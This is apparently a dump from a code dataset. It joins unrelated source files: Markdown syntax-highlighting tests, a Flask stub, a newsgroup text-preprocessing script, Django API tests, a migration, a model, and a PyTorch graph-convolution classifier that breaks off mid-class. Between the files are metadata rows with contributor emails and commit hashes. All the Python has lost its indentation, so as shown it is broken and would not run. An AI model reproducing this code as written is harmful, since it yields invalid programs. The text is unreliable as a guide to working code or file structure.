A<
A<<
''')
self.check_no_scope('^.+$', 'invalid')
def test_headings(self):
self.set_text('''
# A
## B
### C
#### D
##### E
###### F
G
#K
##L#
### M ##
#### N ###########
O
''')
self.check_eq_scope(list('ABCDEFKLMN'), 'entity.name.section')
self.check_in_scope(list('ABCDEFKLMN# '), 'markup.heading')
self.check_eq_scope(r'#+', 'punctuation.definition')
self.check_default(list('GO'))
def test_setext_headings(self):
self.set_text('''
A
===
B
---
C
D
=======
E
F
-------
Z
''')
self.check_eq_scope('=+', 'markup.heading.1')
self.check_eq_scope('-+', 'markup.heading.2')
self.check_default(r'\w+')
def test_not_setext_headings(self):
self.set_text('''
- A
===
> B
---
C
=======
D
--
E
- - -
-------
-------
========
Z
''')
self.check_no_scope('.+', 'markup.heading')
def test_inline_markup_inside_headings(self):
self.set_text('''
#_A_
## B _C_
### D _E_ F
#### K _L M_ N #
Z
''')
self.check_eq_scope([
'_A_', 'B _C_', 'D _E_ F', 'K _L M_ N'
], 'entity.name.section')
self.check_in_scope(list('ABCDEFKLMN#_ '), 'markup.heading')
self.check_eq_scope([ '_A_', '_C_', '_E_', '_L M_' ], 'markup.italic')
self.check_eq_scope(r'#+', 'punctuation.definition')
self.check_default(r'Z')
def test_fenced_paragraph(self):
self.set_text('''
K
```
A
```
L
''')
self.check_eq_scope(r'```\nA\n```\n', 'markup.raw.block.fenced')
self.check_eq_scope('`+', 'punctuation.definition')
self.check_default([ r'K\n\n', r'\nL\n' ])
def test_fenced_block_inside_paragraph(self):
self.set_text('''
K
```
A
```
L
''')
self.check_eq_scope(r'```\nA\n```\n', 'markup.raw.block.fenced')
self.check_eq_scope('`+', 'punctuation.definition')
self.check_default([ r'\nK\n', r'L\n\n' ])
def test_syntax_highlighting_inside_fenced_blocks(self):
self.set_text('''
``` c++
int x = 123;
```
```python
def g():
return 567
```
''')
self.check_eq_scope([ 'int', 'def' ], 'storage.type')
self.check_eq_scope([ '123', '567' ], 'constant.numeric')
self.check_eq_scope('g', 'entity.name')
self.check_eq_scope('return', 'keyword.control')
def test_indented_raw_blocks(self):
self.set_text('''
A
B
C
''')
self.check_eq_scope(r' B\n', 'markup.raw.block')
self.check_default([ r'\nA\n\n', r'\nC\n' ])
def test_multiline_indented_raw_blocks(self):
self.set_text('''
A
B
''')
self.check_eq_scope(r' A\n B\n', 'markup.raw.block')
def test_indented_raw_blocks_glued_to_text(self):
self.set_text('''
A
B
C
D
''')
self.check_eq_scope(r' C\n', 'markup.raw.block')
self.check_default([ r'\nA\n B\n\n', r'D\n' ])
def test_blank_line_is_not_indented_raw_block(self):
self.set_text('\n\n \n\n')
self.check_default(r'\n[ ]+\n')
def test_inline_raw_text(self):
self.set_text('''
A `B` C
D`E`F
K `L **M` N** O
''')
self.check_eq_scope(list('BE') + [ r'L \*\*M' ], 'markup.raw.inline.content')
self.check_eq_scope('`', 'punctuation.definition')
self.check_default(list('ACDFK') + [ r' N\*\* O' ])
def test_incomplete_or_multiline_inline_raw_text(self):
self.set_text('''
A `B
C` D
''')
self.check_default('.+')
def test_multiple_backquotes_as_inline_raw_delimiters(self):
self.set_text('''
``A``
```B``
``C```
''')
self.check_eq_scope(list('AC'), 'markup.raw.inline.content')
self.check_eq_scope('`B', 'markup.raw.inline.content')
self.check_eq_scope([ r'^``', r'(?<=\w)``' ], 'punctuation.definition')
self.check_default([ r'(?<=C``)`', r'\n' ])
def test_inline_raw_delimiters_do_not_start_fenced_block(self):
self.set_text('''
```A```
B
''')
self.check_eq_scope('```A```', 'markup.raw.inline.markdown')
self.check_eq_scope('A', 'markup.raw.inline.content')
self.check_eq_scope('```', 'punctuation.definition')
self.check_default(r'B')
def test_quoted_text_alone(self):
self.set_text('>A\n')
self.check_eq_scope(r'>A\n', 'markup.quote')
self.check_eq_scope(r'>', 'punctuation.definition')
def test_one_line_quoted_block(self):
self.set_text('''
>A
B
''')
self.check_eq_scope(r'>A\n', 'markup.quote')
self.check_eq_scope(r'>', 'punctuation.definition')
self.check_default(r'\nB\n')
def test_type_1_multiline_quoted_block(self):
self.set_text('''
>A
B
C
''')
self.check_eq_scope(r'>A\nB\n', 'markup.quote')
self.check_eq_scope(r'>', 'punctuation.definition')
self.check_default(r'\nC\n')
def test_type_2_multiline_quoted_block(self):
self.set_text('''
>A
>B
C
''')
self.check_eq_scope(r'>A\n>B\n', 'markup.quote')
self.check_eq_scope(r'>', 'punctuation.definition')
self.check_default(r'\nC\n')
def test_quoted_block_inside_paragraph(self):
self.set_text('''
A
>B
C
''')
self.check_eq_scope(r'>B\n', 'markup.quote')
self.check_default([ r'\nA\n', r'\nC\n' ])
def test_spaces_before_and_after_quote_signs(self):
self.set_text('''
> A
> B
> C
D
''')
self.check_eq_scope(r' > A\n {2}> {2}B\n {3}> {3}C\n', 'markup.quote')
self.check_eq_scope(r'>', 'punctuation.definition')
self.check_default(r'\nD\n')
def test_inline_markup_inside_quoted_text(self):
self.set_text('''
> `A`
> _B_
> **C**
''')
self.check_eq_scope('`A`', 'markup.raw.inline.markdown')
self.check_eq_scope('_B_', 'markup.italic')
self.check_eq_scope(r'\*\*C\*\*', 'markup.bold')
def test_list_item_alone(self):
self.set_text(
'''- A
''')
self.check_eq_scope(r'- A\n', 'meta.paragraph.list')
self.check_eq_scope(r'-', 'punctuation.definition')
def test_multiline_list(self):
self.set_text('''
- A
- B
C
''')
self.check_eq_scope(r'- A\n- B\n', 'meta.paragraph.list')
self.check_eq_scope(r'-', 'punctuation.definition')
self.check_default(r'\nC\n')
def test_different_types_of_unnumbered_list_bullets(self):
self.set_text('''
- A
+ B
* C
D
''')
self.check_eq_scope(r'- A\n\+ B\n\* C\n', 'meta.paragraph.list')
self.check_eq_scope([ r'\+', r'\*', '-' ], 'punctuation.definition')
self.check_default(r'D')
def test_numbered_list(self):
self.set_text('''
0. A
1. B
12345. C
D
''')
self.check_eq_scope(r'0\. A\n1\. B\n\d+\. C\n', 'meta.paragraph.list')
self.check_eq_scope([ r'0\.', r'1\.', '12345\.' ], 'punctuation.definition')
self.check_default(r'D')
def test_nested_lists(self):
self.set_text('''
- A
* B
+ C
1. D
2. E
Z
''')
self.check_eq_scope(r'- A\n \* B\n \+ C\n +1\. D\n2\. E\n', 'meta.paragraph.list')
self.check_eq_scope([ '-', r'\*', r'\+', r'1\.', r'2\.' ], 'punctuation.definition')
self.check_default('Z')
def test_spaces_after_bullet(self):
self.set_text('''
-A
- B
- C
Z
''')
self.check_eq_scope(r'- B\n- +C\n', 'meta.paragraph.list')
self.check_eq_scope([ r'-(?= B)', r'-(?= +C)' ], 'punctuation.definition')
self.check_default('Z')
def test_list_inside_paragraph(self):
self.set_text('''
A
- B
''')
self.check_eq_scope(r'- B\n', 'meta.paragraph.list')
self.check_default(r'\nA\n')
def test_inline_markup_inside_list_items(self):
self.set_text('''
- `A`
- _B_
- **C**
''')
self.check_in_scope(r'-.*$\n', 'meta.paragraph.list')
self.check_eq_scope('`A`', 'markup.raw.inline.markdown')
self.check_eq_scope('_B_', 'markup.italic')
self.check_eq_scope(r'\*\*C\*\*', 'markup.bold')
def test_multiline_list_items(self):
self.set_text('''
- A
B
- C
D
Z
''')
self.check_eq_scope(r' - A\n B\n - C\nD\n', 'meta.paragraph.list')
self.check_default('Z')
def test_multiline_list_item_with_paragraph(self):
self.set_text('''
- A
B
C
- D
E
F
Z
''')
self.check_eq_scope(r'- A\n', 'meta.paragraph.list')
self.check_eq_scope(r' B\nC\n- D\n', 'meta.paragraph.list')
self.check_eq_scope(r' E\nF\n', 'meta.paragraph.list')
self.check_default('Z')
def test_4_spaces_in_multiline_list_item(self):
self.set_text('''
- A
B
C
- D
E
F
Z
''')
self.check_eq_scope(r'- A\n {4}B\n {4}C\n', 'meta.paragraph.list')
self.check_eq_scope(r'- D\n', 'meta.paragraph.list')
self.check_eq_scope(r' {4}E\n {4}F\n', 'meta.paragraph.list')
self.check_default('Z')
def test_4_spaces_before_nested_list_items(self):
self.set_text('''
- A
- B
- C
Z
''')
self.check_eq_scope(r'- A\n {4}- B\n {8}- C\n', 'meta.paragraph.list')
self.check_default('Z')
def test_fenced_block_is_not_part_of_a_list_item(self):
self.set_text('''
- A
```
B
```
Z
''')
self.check_eq_scope(r'- A\n', 'meta.paragraph.list')
self.check_eq_scope(r'```\nB\b\n```\n', 'markup.raw.block.fenced')
self.check_default('Z')
def test_inline_links(self):
self.set_text('''
[A](B)
[C] (D)
[E](F "G")

![C] (D)

Z
''')
self.check_eq_scope([
r'^\[A\]\(B\)',
r'^\[C\]\s+\(D\)',
r'^\[E\]\(F "G"\)'
], 'meta.link.inline')
self.check_eq_scope([
r'^!\[A\]\(B\)',
r'^!\[C\]\s+\(D\)',
r'^!\[E\]\(F "G"\)'
], 'meta.image.inline')
self.check_eq_scope(list('ACE'), 'string.other.link.title')
self.check_eq_scope(list('BDF'), 'markup.underline.link')
self.check_eq_scope('G', 'string.other.link.description.title')
self.check_eq_scope([ r'!', r'\[', r'\]' ], 'punctuation.definition')
self.check_default('Z')
def test_reference_links(self):
self.set_text('''
[A][B]
[C] [D]
![E][F]
![G] [H]
Z
''')
self.check_eq_scope(r'\[A\]\[B\]', 'meta.link.reference')
self.check_eq_scope(r'\[C\]\s+\[D\]', 'meta.link.reference')
self.check_eq_scope(r'!\[E\]\[F\]', 'meta.image.reference')
self.check_eq_scope(r'!\[G\]\s+\[H\]', 'meta.image.reference')
self.check_eq_scope(list('ACEG'), 'string.other.link.title')
self.check_eq_scope(list('BDFH'), 'constant.other.reference.link')
self.check_eq_scope([ r'!', r'\[', r'\]' ], 'punctuation.definition')
self.check_default('Z')
def test_implicit_links(self):
self.set_text('''
[A][]
[B] []
![C][]
![D] []
Z
''')
self.check_eq_scope([ r'\[A\]\[\]', r'\[B\] \[\]' ],
'meta.link.reference')
self.check_eq_scope([ r'!\[C\]\[\]', r'!\[D\] \[\]' ],
'meta.image.reference')
self.check_eq_scope(list('ABCD'), 'constant.other.reference.link')
self.check_eq_scope(r'[!\[\]]', 'punctuation.definition')
self.check_default('Z')
def test_multiline_links_not_supported(self):
self.set_text('''
[A
B](C)
[D
E][F]

![D
E][F]
''')
self.check_default('.+')
def test_inline_markup_inside_links(self):
self.set_text('''
[__A__](B)
[_C_][D]

![_G_][H]
Z
''')
self.check_eq_scope(r'\[__A__\]\(B\)', 'meta.link.inline')
self.check_eq_scope(r'\[_C_\]\[D\]', 'meta.link.reference')
self.check_eq_scope(r'!\[__E__\]\(F\)', 'meta.image.inline')
self.check_eq_scope(r'!\[_G_\]\[H\]', 'meta.image.reference')
self.check_eq_scope([ '__A__', '__E__' ], 'markup.bold')
self.check_eq_scope([ '_C_', '_G_' ], 'markup.italic')
self.check_default('Z')
def test_inline_markup_outside_links(self):
self.set_text('''
**[A](X)**
__[B][X]__
**
_![D][X]_
Z
''')
self.check_eq_scope(r'\*\*\[A\]\(X\)\*\*', 'markup.bold')
self.check_eq_scope(r'__\[B\]\[X\]__', 'markup.bold')
self.check_eq_scope(r'\*!\[C\]\(X\)\*', 'markup.italic')
self.check_eq_scope(r'_!\[D\]\[X\]_', 'markup.italic')
self.check_default('Z')
def test_references(self):
self.set_text('''
[A]: B "C"
[D]:<E> 'F'
[K]: L (M)
[N]: O
Z
''')
self.check_eq_scope(r'\[.*?(?=\s*$)', 'meta.link.reference.def')
self.check_eq_scope(r'''[\[\]:'"()]''', 'punctuation')
self.check_eq_scope(list('ADKN'), 'constant.other.reference.link')
self.check_eq_scope(list('BELO'), 'markup.underline.link')
self.check_eq_scope(list('CFM'), 'string.other.link.description.title')
self.check_default('Z')
def test_supported_urls(self):
self.set_text('''
http://A.B
https://C.D
ftp://E.F
http://H.I.J
http://K.L/
http://M.N/O?P=Q&R=S
http://Q.W:123
http://Q.W.E:123/
Z
''')
self.check_eq_scope(r'^.+://.+$', 'markup.underline.link')
self.check_eq_scope(r'^.+://.+$', 'meta.link.inet')
self.check_default('Z')
def test_unsupported_urls(self):
self.set_text('''
http://A
http://A:80
http://A:80.C
ssh://B.C
http://D/E
http://A?B.C
''')
self.check_default('.+')
def test_urls_in_brackes(self):
self.set_text('''
<http://A.B>
<https://C.D>
<ftp://E.F>
<http://H.I.J>
<http://K.L/>
<http://M.N/O?P=Q&R=S>
<http://Q.W:123>
<http://Q.W.E:123/>
Z
''')
self.check_eq_scope(r'http://A\.B', 'markup.underline.link')
self.check_eq_scope(r'^.+://.+$', 'meta.link.inet')
self.check_eq_scope(r'[<>]', 'punctuation.definition')
self.check_default('Z')
def test_emails(self):
self.set_text('''
<A@B.C>
<mailto:D@E.F>
O@P.Q
mailto:R@S.T
Z
''')
self.check_eq_scope(r'A@B.C', 'markup.underline.link')
self.check_eq_scope(r'mailto:R@S.T', 'markup.underline.link')
self.check_eq_scope(r'[^\s@]+@\S+', 'meta.link.email')
self.check_eq_scope(r'[<>]', 'punctuation.definition')
self.check_default('Z')
def test_strikethrough(self):
self.set_text('''
A ~~B~~ ~~C D~~ E
''')
self.check_eq_scope([ '~~B~~', '~~C D~~' ], 'markup.strikethrough')
self.check_eq_scope('~~', 'punctuation.definition.strikethrough')
self.check_default(list('AE'))
def test_unsupported_strikethrough(self):
self.set_text('''
~~A
B~~
~~ C~~
~~D ~~
E~~F~~
''')
self.check_default('.+')
def test_strikethrough_with_bold_italic(self):
self.set_text('''
*__~~A~~__*
*~~__B__~~*
~~*__C__*~~
___~~D~~___
~~___E___~~
Z
''')
self.check_eq_scope([
r'~~A~~', r'~~__B__~~', r'~~\*__C__\*~~',
r'~~D~~', r'~~___E___~~'
], 'markup.strikethrough')
self.check_eq_scope([
r'__~~A~~__', r'__B__', r'__C__',
r'___~~D~~___', r'___E___'
], 'markup.bold')
self.check_eq_scope([
r'\*__~~A~~__\*', r'\*~~__B__~~\*', r'\*__C__\*',
r'___~~D~~___', r'___E___'
], 'markup.italic')
self.check_eq_scope(r'~+|_+|\*+', 'punctuation.definition')
self.check_default('Z')
def test_html_tags(self):
self.set_text('''
A<br>
<li>B
<a href="http://C.D">E</a>
''')
self.check_default([ r'\nA', r'\n', r'B\n', 'E' ])
self.check_eq_scope([ '<br>', '<li>',
'<a href="http://C.D">', '</a>' ],
'meta.tag')
def test_block_tags_turn_off_markdown_markup(self):
self.set_text('''
<p>
*A* ~~B~~ __C__
</p>
<div>*D* ~~E~~ __F__</div>
''')
self.check_no_scope(list('ABCDEF'), 'markup')
def test_inline_markup_combined_with_html(self):
self.set_text('<a>_A_</a>')
self.check_eq_scope('_A_', 'markup.italic')
self.check_eq_scope([ '<a>', '</a>' ], 'meta.tag')
def test_horisontal_lines(self):
self.set_text('''
***
* * *
___
__ __ __
- - -
----------------
---_---
Z
''')
self.check_eq_scope([
r'\*\*\*\n',
r'\* \* \*\n',
r'___\n',
r' __ __ __\n',
r' - - - \n',
r' -----+ +\n'
], 'meta.separator')
self.check_default(['---_---', 'Z'])
def test_horisontal_lines_break_paragraphs(self):
self.set_text('''
A
- - -
Z
''')
self.check_eq_scope('- - -\n', 'meta.separator')
self.check_default(['A', 'Z'])
|
[
"sekogan@gmail.com"
] |
sekogan@gmail.com
|
fee23db67ca1b01428550a6fd45ebdf1149b381a
|
19a86ab59d3ab02103a0b12c2cb4eebdcf028679
|
/app.py
|
40f11fd05d7032f13ce823d7e818a763ff66e0a8
|
[] |
no_license
|
npvandyke/surfs_up
|
e5acee499baa6a51b4bf19d9ee6d551de8ac1a70
|
e9f5a59db7aec07a9e756a105a54f539dee6f04b
|
refs/heads/main
| 2023-03-29T17:48:34.057067
| 2021-04-01T22:11:33
| 2021-04-01T22:11:33
| 350,831,329
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 217
|
py
|
# Import dependency
from flask import Flask
# Create a new Flask app instance
app = Flask(__name__)
# Define the starting point (root) of the first route
@app.route('/')
def hello_world():
return 'Hello world'
|
[
"npcolletti@gmail.com"
] |
npcolletti@gmail.com
|
b7c9571822e30c675a4bbb00ce1a6faff3a0bc1f
|
7274ce2b75d49a90c57e9220756bc9beb532c9e1
|
/preprocess/main_newsgroup_preprocess.py
|
36536c615b9bbfb43c48daa740c439bcd3c1effb
|
[] |
no_license
|
chauncyzhu/textclassification
|
4eb03f2b11abd67680daab24f373971ce33d89cd
|
0b3960f748ba66278250132d8b16d189cabe4a3f
|
refs/heads/master
| 2021-01-19T08:59:13.889878
| 2018-03-10T05:38:19
| 2018-03-10T05:38:19
| 87,704,238
| 2
| 0
| null | null | null | null |
GB18030
|
Python
| false
| false
| 3,853
|
py
|
# coding=gbk
import preprocess.data_clean.newsgroup.import_data as id
import preprocess.data_clean.newsgroup.clean_data as cd
import utils.newsgroup_path as path
import preprocess.transfer_vector.voca_dict.voca_data as vd #可以共用的部分
import preprocess.transfer_vector.generate_vector.feature as feature
import preprocess.transfer_vector.generate_vector.transfer_vector as tv
"""
对函数进行调用,下面部分主要是对20newsgroup语料库进行处理
"""
CONFIRM_POS_CLASS = 0 #指定二分类正类序号
#数据清理和字典获取,多分类和二分类的class_num不一样
def __voca_dict(class_num,voca_csv=None):
#读取数据并转为dataframe
#pd_train, pd_test = id.getTrainAndTest(path.SOURCEFILE) #如果训练集和测试集需要分开
pd_train = id.getPDData(path.TRAIN_TEXT)
pd_test = id.getPDData(path.TEST_TEXT)
cd.clean_data(pd_train) #分词(如果需要清理可以进行清理)
cd.clean_data(pd_test)
# 获取分类字典,如果是多分类class_num>2,如果是二分类,class_num=2
# 获取分类字典,如果是多分类class_num>2,如果是二分类,class_num=2
# pd_train = pd_train.head(100) #控制训练集个数
voca_dict = vd.getRelativeValue(pd_train, vd.getUniqueVocabulary(pd_train),
class_num) # getUniqueVocabulary比较耗时,存储在csv中
# 如需增加更多term weighting schema,在这里添加
feature.getBDCVector(voca_dict, class_num, "bdc") # 根据字典计算BDC值,需要指定index
#feature.getDFBDCVector(voca_dict, class_num, "df_bdc") # 根据字典计算DF_BDC值,需要指定index
feature.getTotalVoca(pd_test, voca_dict) # 将测试集中的特征加入到词典中
if voca_csv: # 如果存在则写入文件中
voca_dict.to_csv(voca_csv)
print(voca_dict)
return pd_train, pd_test, voca_dict
#转化为不同的向量
def __generate_vector(pd_train,pd_test,voca_dict,feature_name,train_csv=None,test_csv=None):
pd_train_copy = pd_train.copy() #防止数据干扰
pd_test_copy = pd_test.copy()
# 测试集和训练集转为向量
tv.changeToFeatureVector(pd_train_copy, voca_dict, feature_name)
tv.changeToFeatureVector(pd_test_copy, voca_dict, feature_name)
if train_csv:
pd_train_copy.to_csv(train_csv) # 写入训练文件中
if test_csv:
pd_test_copy.to_csv(test_csv) # 写入测试文件中
#多分类的数据处理操作
def multi_class_data():
class_num = 20 # 多分类的类别个数,newsgroup最多只有6个类别
pd_train, pd_test,voca_dict = __voca_dict(class_num, voca_csv=path.VOCA_MULTI_CSV) #获取多分类的字典,包括
__generate_vector(pd_train, pd_test, voca_dict,"bdc", train_csv=path.TRAIN_MULTI_BDC_CSV, test_csv=path.TEST_MULTI_BDC_CSV)
#__generate_vector(pd_train, pd_test, voca_dict,"df_bdc", train_csv=path.TRAIN_MULTI_DF_BDC_CSV, test_csv=path.TEST_MULTI_DF_BDC_CSV)
#获得二分类数据
def binary_class_data():
class_num = 2 # 二分类的类别个数
pd_train, pd_test,voca_dict = __voca_dict(class_num, voca_csv=path.VOCA_BINARY_CSV) #获取多分类的字典,包括
# 应该根据指定的正类改变二分类中的class
def f(x):
if x[CONFIRM_POS_CLASS] == 1:
return [1, 0]
else:
return [0, 1]
pd_train['class'] = pd_train['class'].apply(f)
pd_test['class'] = pd_test['class'].apply(f)
__generate_vector(pd_train, pd_test, voca_dict,"bdc", train_csv=path.TRAIN_BINARY_BDC_CSV, test_csv=path.TEST_BINARY_BDC_CSV)
__generate_vector(pd_train, pd_test, voca_dict,"df_bdc", train_csv=path.TRAIN_BINARY_DF_BDC_CSV, test_csv=path.TEST_BINARY_DF_BDC_CSV)
if __name__ == '__main__':
multi_class_data()
#binary_class_data()
|
[
"chauncyzhu@163.com"
] |
chauncyzhu@163.com
|
bf38c9ba21a9178526560f3d4d833892fc472830
|
4ac6645c5925feefc8a3ab8587d08edc6edb220e
|
/school/unit/tests/test_api.py
|
0abf5166aa3e74b405609fa0d4013d54c6ac092d
|
[
"MIT"
] |
permissive
|
yucealiosman/school
|
4a4b701a8ef87fc15b637e655f4d995a0b243adf
|
630059760f411c163db57f980b780d8501aa1a6d
|
refs/heads/main
| 2023-09-04T05:25:36.278730
| 2021-03-19T12:28:33
| 2021-03-19T15:05:17
| 349,236,587
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,007
|
py
|
import json
from unittest.mock import patch
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase, APIClient
from school.unit import models
from school.unit.tests import factories
from school.unit.tests.factories import SuperUserFactory
class BaseTest(APITestCase):
def setUp(self):
self.client = APIClient()
self.client.force_authenticate(user=SuperUserFactory())
class StudentApiTest(BaseTest):
def test_student_list(self):
student_count = 5
teacher = factories.TeacherFactory()
class_room = factories.ClassRoomFactory(teachers=[teacher])
student_list = factories.StudentFactory.create_batch(
class_room=class_room, size=student_count)
expected_student_pk_set = {str(student.pk) for student in
student_list}
response = self.client.get(reverse('students-list'))
data = response.json()
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(data['count'], student_count)
student_pk_set_from_resp = {student["pk"] for student in
data["results"]}
self.assertEqual(expected_student_pk_set, student_pk_set_from_resp)
def test_student_detail(self):
teacher = factories.TeacherFactory()
class_room = factories.ClassRoomFactory(teachers=[teacher])
student = factories.StudentFactory(class_room=class_room)
response = self.client.get(
reverse('students-detail', kwargs={'pk': str(student.pk)}))
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
data = response.json()
self.assertEqual(class_room.code, data["class_room"]["code"])
teacher_pk_list_from_resp = [teacher["pk"] for teacher in
data["class_room"]["teachers"]]
self.assertEqual(teacher_pk_list_from_resp, [str(teacher.pk)])
class HomeWorkApiTest(BaseTest):
@patch('school.unit.services.HomeWorkService.notify')
def test_create_homework(self, notify_mock):
teacher = factories.TeacherFactory()
class_room = factories.ClassRoomFactory(teachers=[teacher])
hw_not_created = factories.ClassHomeWorkFactory.build()
data = {
'title': hw_not_created.title,
'description': hw_not_created.description,
'class_room': str(class_room.pk)
}
response = self.client.post(
reverse('homeworks-by-teacher-list',
kwargs={'teacher__pk': str(teacher.pk)}),
data=json.dumps(data),
content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED,
response.data)
data = response.json()
hw_created = models.ClassHomeWork.objects.get(pk=data["pk"])
self.assertEqual(data["title"], hw_not_created.title)
self.assertEqual(data["description"], hw_not_created.description)
self.assertEqual(data["teacher"], str(teacher.pk))
self.assertEqual(data["class_room"], str(class_room.pk))
notify_mock.assert_called_once_with(hw_created, 'created')
@patch('school.unit.services.HomeWorkService.notify')
def test_update_homework(self, notify_mock):
teacher = factories.TeacherFactory()
class_room = factories.ClassRoomFactory(teachers=[teacher])
homework = factories.ClassHomeWorkFactory(class_room=class_room,
teacher=teacher)
new_description = "New HomeWork description"
update_data = {
'description': new_description
}
response = self.client.patch(
reverse('homeworks-by-teacher-detail',
kwargs={'teacher__pk': str(teacher.pk),
'pk': str(homework.pk)}),
data=json.dumps(update_data),
content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
data = response.json()
self.assertEqual(data["description"], new_description)
notify_mock.assert_called_once_with(homework, 'updated')
@patch('school.unit.services.HomeWorkService.notify')
def test_delete_homework(self, notify_mock):
homework = factories.ClassHomeWorkFactory()
response = self.client.delete(
reverse('homeworks-by-teacher-detail',
kwargs={'teacher__pk': str(homework.teacher.pk),
'pk': str(homework.pk)}))
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT,
response.data)
self.assertFalse(
models.ClassHomeWork.objects.filter(pk=homework.pk).exists())
notify_mock.assert_called_once()
|
[
"aliosmanyuce@gmail"
] |
aliosmanyuce@gmail
|
025e7c2fd0563d6420b77dde0117743c67a0e7a4
|
1578ce4b2961a0b89b7fac47e9063acaced21b4c
|
/address/migrations/0002_address_customer.py
|
279c38da990f0df58c68a7d18957b0fcedd9135e
|
[] |
no_license
|
mrpyrex/epytech
|
8125c50b7274ec8511d0677f33b0569ebc5472b5
|
e511cdecc8b554f65ed135b9ac6d312c278fc873
|
refs/heads/master
| 2020-07-20T10:40:17.001431
| 2019-09-11T20:38:42
| 2019-09-11T20:38:42
| 206,624,763
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 616
|
py
|
# Generated by Django 2.1.7 on 2019-09-04 07:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('address', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='address',
name='customer',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
]
|
[
"ndifrkeumoren@gmail.com"
] |
ndifrkeumoren@gmail.com
|
0c081fd0cf2dee0806a9c57bd30da55b4a4b8187
|
6c4faabeddafecdbe11d1f8250dbff620e03fa07
|
/listings/models.py
|
1339df6f0d4266275c5abe1b27349a86d9834151
|
[] |
no_license
|
donnyboi/btre
|
20565e7c1a6411c808b38a72645a96c0d3196b44
|
174671348e680241a9af50b379595fc817596488
|
refs/heads/master
| 2020-11-26T05:08:01.996657
| 2020-03-19T07:50:13
| 2020-03-19T07:50:13
| 228,972,059
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,508
|
py
|
from django.db import models
from datetime import datetime
from realtors.models import Realtor
# Create your models here.
class Listing(models.Model):
realtor = models.ForeignKey(Realtor, on_delete=models.DO_NOTHING)
title = models.CharField(max_length=200)
address = models.CharField(max_length=200)
city = models.CharField(max_length=100)
state = models.CharField(max_length=100)
zipcode = models.CharField(max_length=20)
description = models.TextField(blank=True)
price = models.IntegerField()
title = models.CharField(max_length=200)
bedrooms = models.IntegerField()
bathrooms = models.DecimalField(max_digits=2, decimal_places=1)
garage = models.IntegerField(default=0)
sqft = models.IntegerField()
lot_size = models.DecimalField(max_digits=5, decimal_places=1)
photo_main = models.ImageField(upload_to='photos/%Y/%m/%d/')
photo_1 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_2 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_3 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_4 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_5 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_6 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
is_published = models.BooleanField(default=True)
list_date = models.DateTimeField(default=datetime.now, blank=True)
def __str__(self):
return self.title
|
[
"diresher@gmail.com"
] |
diresher@gmail.com
|
74c0f20f27a5b7bcad076b8a5b964d41878080ab
|
0a6b07635bfe1cda46fb9a537c3f5974c091f89a
|
/ExprGCNPPI.py
|
ec9a99c34d0d184b7f45fec3b1df86c652ecaa91
|
[] |
no_license
|
sabdollahi/WinBinVec
|
89096b48612a1efa24c4f9ea63f27cdc185059b4
|
5b4b2e7f0e9d97eccc9d558449d4dfaf36d53da3
|
refs/heads/main
| 2023-07-11T05:24:05.141008
| 2021-08-25T09:50:12
| 2021-08-25T09:50:12
| 309,229,996
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,400
|
py
|
from __future__ import division
from __future__ import print_function
import time
import argparse
import numpy as np
import torch
import torch.nn.functional as F
import torch.optim as optim
import math
import torch.nn as nn
from torch.nn.parameter import Parameter
from torch.nn.modules.module import Module
import numpy as np
import seaborn as sns
from sklearn.metrics import roc_curve, auc
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import roc_auc_score
import os
import pickle
from sklearn.model_selection import KFold
from torch.autograd import Variable
from sklearn.utils import shuffle
#"GraphConvolution" and "GCN" classes are obtained from the following GitHub repository
#https://github.com/tkipf/pygcn
class GraphConvolution(Module):
def __init__(self, in_features, out_features, bias=True):
super(GraphConvolution, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.weight = Parameter(torch.FloatTensor(in_features, out_features))
if bias:
self.bias = Parameter(torch.FloatTensor(out_features))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
stdv = 1. / math.sqrt(self.weight.size(1))
self.weight.data.uniform_(-stdv, stdv)
if self.bias is not None:
self.bias.data.uniform_(-stdv, stdv)
def forward(self, input, adj):
support = torch.mm(input, self.weight)
output = torch.spmm(adj, support)
if self.bias is not None:
return output + self.bias
else:
return output
def __repr__(self):
return self.__class__.__name__ + ' (' \
+ str(self.in_features) + ' -> ' \
+ str(self.out_features) + ')'
class GCN(nn.Module):
def __init__(self, nfeat, nhid, nclass, dropout):
super(GCN, self).__init__()
self.gc1 = GraphConvolution(nfeat, nhid)
self.gc2 = GraphConvolution(nhid, nclass)
self.dropout = dropout
def forward(self, x, adj):
x = F.relu(self.gc1(x, adj))
x = F.dropout(x, self.dropout, training=self.training)
x = self.gc2(x, adj)
return F.log_softmax(x, dim=1)
#ExprGCNPPI implemented by Sina Abdollahi for WinBinVec paper
class ExprGCNPPI(nn.Module):
def __init__(self):
super(ExprGCNPPI, self).__init__()
self.gcn = GCN(nfeat=1, nhid=8, nclass=1, dropout=0.5)
#626: The number of partner proteins involve in the PPIs
self.fc1 = nn.Linear(572, 256)
self.fc2 = nn.Linear(256, 8)
self.fc3 = nn.Linear(8, 2)
self.bn1 = nn.BatchNorm1d(num_features=256)
self.drop1 = torch.nn.Dropout(0.4)
